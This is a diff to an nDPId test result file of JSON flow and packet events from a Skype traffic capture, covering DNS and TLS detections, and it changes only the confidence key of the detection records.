00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1431970635433,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1431970635433,"pkt":"0NQSxnP1PBXCt3IOCABFAABECpEAAEAR7KTAqAEiwKgBAfitADUAMI+fhgYBAAABAAAAAAAABWU0NTkzAWcKYWthbWFpZWRnZQNuZXQAAAEAAQ=="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970635433,"flow_last_seen":1431970635433,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1431970635433,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63661,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970635433,"flow_last_seen":1431970635433,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1431970635433,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63661,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": 
{"query":"e4593.g.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1431970635489,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1431970635489,"pkt":"PBXCt3IO0NQSxnP1CABFAABUAABAAEARtyXAqAEBwKgBIgA1+K0AQBV0hgaBgAABAAEAAAAABWU0NTkzAWcKYWthbWFpZWRnZQNuZXQAAAEAAcAMAAEAAQAAAAMABBfOIaY="} -00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":48,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431970635433,"flow_last_seen":1431970635489,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431970635489,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63661,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.206.33.166"}} 
+00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":48,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431970635433,"flow_last_seen":1431970635489,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431970635489,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63661,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.206.33.166"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970635489,"flow_last_seen":1431970635489,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970635489,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51231,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1431970635489,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970635489,"pkt":"0NQSxnP1PBXCt3IOCABFAABAPS1AAEAGAk3AqAEiF84hpsgfAbv4Tz2XAAAAALAC\/\/9zuAAAAgQFtAEDAwUBAQgKPjGKEwAAAAAEAgAA"} 
00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1431970635531,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1431970635531,"pkt":"0NQSxnP1PBXCt3IOCABFAABDdt0AAEARgFnAqAEiwKgBAeUHADUAL+4jvNsBAAABAAAAAAAABGNvbm4Fc2t5cGUGYWthZG5zA25ldAAAHAAB"} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1431970635531,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1431970635531,"pkt":"0NQSxnP1PBXCt3IOCABFAABDiigAAEARbQ7AqAEiwKgBAe0QADUAL\/kqxMsBAAABAAAAAAAABGNvbm4Fc2t5cGUGYWthZG5zA25ldAAAAQAB"} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1431970635534,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970635534,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADkGRn4XziGmwKgBIgG7yB8YNTxd+E89mKASOJCdjgAAAgQFrAQCCArsPW3FPjGKEwEDAwU="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1431970635534,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970635534,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0P2xAAEAGABrAqAEiF84hpsgfAbv4Tz2YGDU8XoAQECz0iAAAAQEICj4xij\/sPW3F"} 
-00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431970635489,"flow_last_seen":1431970635535,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431970635535,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51231,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apps.skype.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431970635489,"flow_last_seen":1431970635535,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431970635535,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51231,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apps.skype.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1431970635681,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431970635681,"pkt":"0NQSxnP1PBXCt3IOCABFAAA762oAAEARC9TAqAEiwKgBAfrwADUAJ8Zq760BAAABAAAAAAAAA2FwaQVza3lwZQNjb20AAAEAAQ=="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1431970635681,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431970635681,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7\/zoAAEAR+APAqAEiwKgBAcLIADUAJ6plKNsBAAABAAAAAAAAA2FwaQVza3lwZQNjb20AABwAAQ=="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1431970635827,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970635827,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/rmUAAEARSNXAqAEiwKgBAfWbADUAK9VUuF8BAAABAAAAAAAABWRzbjEzAWQFc2t5cGUDbmV0AAABAAE="} 
@@ -76,15 +76,15 @@ 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1431970635828,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970635828,"pkt":"0NQSxnP1PBXCt3IOCABFAABLGiMAAEAR3QvAqAEiwKgBAdB8ADUAN25j7f4BAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDExAXIFc2t5cGUDbmV0AAAcAAE="} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636044,"flow_last_seen":1431970636044,"flow_idle_time":7580000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":1,"thread_ts_msec":1431970636044,"l3_proto":"ip4","src_ip":"17.143.160.149","dst_ip":"192.168.1.34","src_port":5223,"dst_port":50407,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00744{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1431970636044,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":263,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":263,"pkt_l4_len":229,"thread_ts_msec":1431970636044,"pkt":"PBXCt3IO0NQSxnP1CABFAAD5QB1AADEGlPMRj6CVwKgBIhRnxOfKLqrmIALxFIAYAQoi5AAAAQEIClVX3cw+MS9sFwMBAMAQLvPrUolszeBH4PjooKgoykESMntuxk1Te2w+x8Oya6GSybBw6qqEM+wWK2sXwWrrizJ5XKzKOAmSZesb7xCcv3da\/+28YcXK\/F7zVFmE31vvvLV8YkG8GBOlPbpZKZERb9mwy2LwmHQtz7O0hAoAaXw9xzeYM92S6l8kX5r5cFIIVhHHc18X56Qt2VFcbjB+OTKH9K3bn722DOl83K579IAjLFDRbrYAdebZ2GL8xgCQwxYSG690LowE4mV3zjs="} 
-00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636044,"flow_last_seen":1431970636044,"flow_idle_time":7580000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":1,"thread_ts_msec":1431970636044,"l3_proto":"ip4","src_ip":"17.143.160.149","dst_ip":"192.168.1.34","src_port":5223,"dst_port":50407,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636044,"flow_last_seen":1431970636044,"flow_idle_time":7580000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":1,"thread_ts_msec":1431970636044,"l3_proto":"ip4","src_ip":"17.143.160.149","dst_ip":"192.168.1.34","src_port":5223,"dst_port":50407,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1431970636044,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970636044,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0K69AAEAGmybAqAEiEY+glcTnFGcgAvEUyi6rq4AQD\/mVBgAAAQEICj4xjDlVV93M"} 00599{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1431970636045,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":156,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":156,"pkt_l4_len":122,"thread_ts_msec":1431970636045,"pkt":"0NQSxnP1PBXCt3IOCABFAACO6xNAAEAG22fAqAEiEY+glcTnFGcgAvEUyi6rq4AYEAB7VwAAAQEICj4xjDlVV93MFwMBACDcBm8C5CuEds5WH7uOVSaoSAeWe3pVfjpiQwGsBHUCdhcDAQAwqX6WBIxQfVe36rHY2TMg9Ev1HCHJmLbDku3Ki37TObTq6YVIEEF1VGVKw\/q+D6y6"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636300,"flow_last_seen":1431970636300,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970636300,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":50055,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1431970636300,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970636300,"pkt":"0NQSxnP1PBXCt3IOCABFAABLV\/cAAEARnzfAqAEiwKgBAcOHADUANwqgVG4BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} -00798{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636300,"flow_last_seen":1431970636300,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970636300,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":50055,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00798{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636300,"flow_last_seen":1431970636300,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970636300,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":50055,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": 
{"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636301,"flow_last_seen":1431970636301,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970636301,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51753,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1431970636301,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970636301,"pkt":"0NQSxnP1PBXCt3IOCABFAABLvh0AAEARORHAqAEiwKgBAcopADUAN1kA5GsBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} -00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636301,"flow_last_seen":1431970636301,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970636301,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51753,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": 
{"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636301,"flow_last_seen":1431970636301,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970636301,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51753,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":94,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636340,"flow_last_seen":1431970636340,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970636340,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51232,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1431970636340,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970636340,"pkt":"0NQSxnP1PBXCt3IOCABFAABAozBAAEAGBGnAqAEinTg0HMggAbskulgsAAAAALAC\/\/+RjgAAAgQFtAEDAwUBAQgKPjGNXAAAAAAEAgAA"} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1431970636420,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431970636420,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6ONsAAEARvmTAqAEiwKgBAfgaADUAJptGWcsBAAABAAAAAAAAAnVpBXNreXBlA2NvbQAAAQAB"} 
@@ -102,7 +102,7 @@ 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1431970636919,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970636919,"pkt":"0NQSxnP1PBXCt3IOCABFAABLIxUAAEAR1BnAqAEiwKgBAdB8ADUAN25j7f4BAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDExAXIFc2t5cGUDbmV0AAAcAAE="} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":216,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970637197,"flow_last_seen":1431970637197,"flow_idle_time":7580000,"flow_min_l4_payload_len":626,"flow_max_l4_payload_len":626,"flow_tot_l4_payload_len":626,"flow_avg_l4_payload_len":626,"midstream":1,"thread_ts_msec":1431970637197,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":51227,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01317{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1431970637197,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":680,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":680,"pkt_l4_len":646,"thread_ts_msec":1431970637197,"pkt":"0NQSxnP1PBXCt3IOCABFAAKaWZdAAEAGpyzAqAEiEaxkJMgbAbtPoUTcdzmC\/1AY\/\/+3vwAAFwMDAm2oQWYRyP748hMxFdAlY7EpLrN6kLughwvFpazZiqEW\/OZDc+EJPuHs5foI32Mtbk82IkMifsIYZr\/HgiWjp+qREkYwozIjDKA5RZr7pIvzcneHU5GjcfdA5I77GYqEliHbS2doHbevDGi5Wa7sLiRbXMA02aUJUp\/5WaIoIiwbOjRHFDMfCP5Z0\/J4lyMuhvKCpFQAO\/2wsDj\/MPbX5tlaL2EUm+IAfj6k00l5GWxpD7mtGhNIVcb8QkIXInLtd3tVvIfRqABdUPRdVk\/Oh8BYWO2hK2Jb5ytXLiGpVvyovjVj1ZXrjmeVOKzHYpnRvZZVE8aFr66jGGaGqwDLQKMakQCl3AK9obxhTX7luk8wNkyeGegCmXzvS4PBGTePDaeLJKSaHfRaaHCxBYP0IhnBKAC4N2jJ7aD0fuZCHAZyigwXRHRquVVgktLhkQLT0TrYI3l3qtmwkgNW3jlZmJ4UQcSOvOidllHsQvfEINIQuYffVEsqMVhXTG+aIO0hcL5jGoK\/2RywKg2\/ZDMiN+K9iSmWjEbwWSaN\/mkdtJTUxH4QcdrB9ORkHB0HW3rfKB\/TAafOnsKWi\/W1MbdmydveZGvrEmiyhj4NuiYhmxDSjj3\/4SRSy9HQ4Wxnu49AdVNnLycIUgrlledmcfb74m5EfYew5ExynB0kOvO\/AHcy3+wEfzmIbZkColXfZHhSlTlGEbBImUFDQWKlAJ0uaFUTw3Rq+PzDdQpZCLYV+ZYFyGNzuzH6vpabtmD1cwx0eABQdDvMezqNrzbAEH58b+AaG+h547E5oMr20bNoOdWJxGzZ\/kyAHLEf4gPOQ8A="} 